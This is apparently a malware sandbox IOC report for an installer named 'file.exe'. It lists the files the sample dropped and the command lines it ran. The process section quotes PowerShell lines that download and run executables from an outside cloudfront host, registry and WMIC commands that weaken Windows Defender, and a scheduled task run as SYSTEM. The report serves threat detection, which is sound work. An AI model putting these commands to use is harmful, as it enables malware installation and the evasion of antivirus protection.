IOC Report
file.exe

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\ProgramData\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\i1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\i3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\u2xs.0.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u2xs.3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\wygmbcpqogng
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\SecureClient\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\System32\GroupPolicy\gpt.ini
ASCII text
dropped
malicious
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\SGcrFlL.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\bMpBlNc.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\$Recycle.Bin\S-1-5-18\desktop.ini
Windows desktop.ini
dropped
C:\ProgramData\AQRFEVRTGL.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ATJBEMHSSB.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BJZFPPWAPT.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BKJEGDGIJECGCBGCGHDGIEGCBF
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\ProgramData\CGIDGCGIEGDGDGDGHJKKKJKECG
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\EEGWXUHVUG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EEGWXUHVUG.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EFOYFBOLXA.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EOWRVPQCCS.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\FCBAECGIEBKKFHIDAKEC
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\FIECBFID
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\ProgramData\GCGCFCBAKKFBFIECAEBAEBGCGD
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\ProgramData\GCGHCBKFCFBFHIDHDBFC
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\IIECFHDB
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\KKJKFBKKECFHJKEBKEHIDAEBKF
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xde84ae3f, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
SysEx File -
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_i1.exe_c02ec481c09e7831ff85bf9f8df2d39985ea1cb_24622bb6_851306bb-3049-4b78-87a4-d0d3d9f59764\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E9B.tmp.dmp
Mini DuMP crash report, 15 streams, Fri Apr 26 15:11:31 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER80FD.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER816C.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\NIRMEKAMZH.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NVWZAPQSQL.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NYMMPCEIMA.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NYMMPCEIMA.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\SQSJKEBWDT.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\iolo\logs\WSComm.log
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\load[1].bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\3cf7150
data
dropped
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\WMSysPr9.prx
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wqh1tun.oqa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sboifax.kbo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd4zkgva.moy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii4ymyyt.aw4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmuh1pmj.nrk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2zltvm2.0lw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orzkbwwe.ro0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vc4djh0s.pl0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxcnj0df.tn2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb12hcsw.i21.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3noldoj.f32.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zylvcivl.rjp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\f09d2dcf
data
dropped
C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\orvniumtri
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Local\Temp\tmp1FAB.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp1FBB.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp1FCC.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpC25E.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
dropped
C:\Users\user\AppData\Local\Temp\u2xs.1.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\u2xs.2\bunch.dat
data
dropped
C:\Users\user\AppData\Local\Temp\u2xs.2\whale.dbf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA80.tmp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk (copy)
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\bunch.dat
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\whale.dbf
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
RAGE Package Format (RPF),
dropped
C:\Windows\Tasks\biPxHmULFllsbMgnpt.job
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_dq1pym4i.djl.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_pccgaugl.z4l.ps1
ASCII text, with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
Chrome Cache Entry: 203
ASCII text, with very long lines (808)
downloaded
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
100 further files are hidden in the source report and not listed here.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
malicious
C:\Users\user\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
malicious
C:\Users\user\AppData\Local\Temp\u2xs.0.exe
"C:\Users\user\AppData\Local\Temp\u2xs.0.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
"C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
malicious
C:\Users\user\AppData\Local\Temp\i3.exe
i3.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Users\user\AppData\Local\Temp\u2xs.3.exe
"C:\Users\user\AppData\Local\Temp\u2xs.3.exe"
malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
.\Install.exe /Bdidlg "385128" /S
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
malicious
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F
malicious
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
malicious
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
malicious
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn biPxHmULFllsbMgnpt
malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn biPxHmULFllsbMgnpt
malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
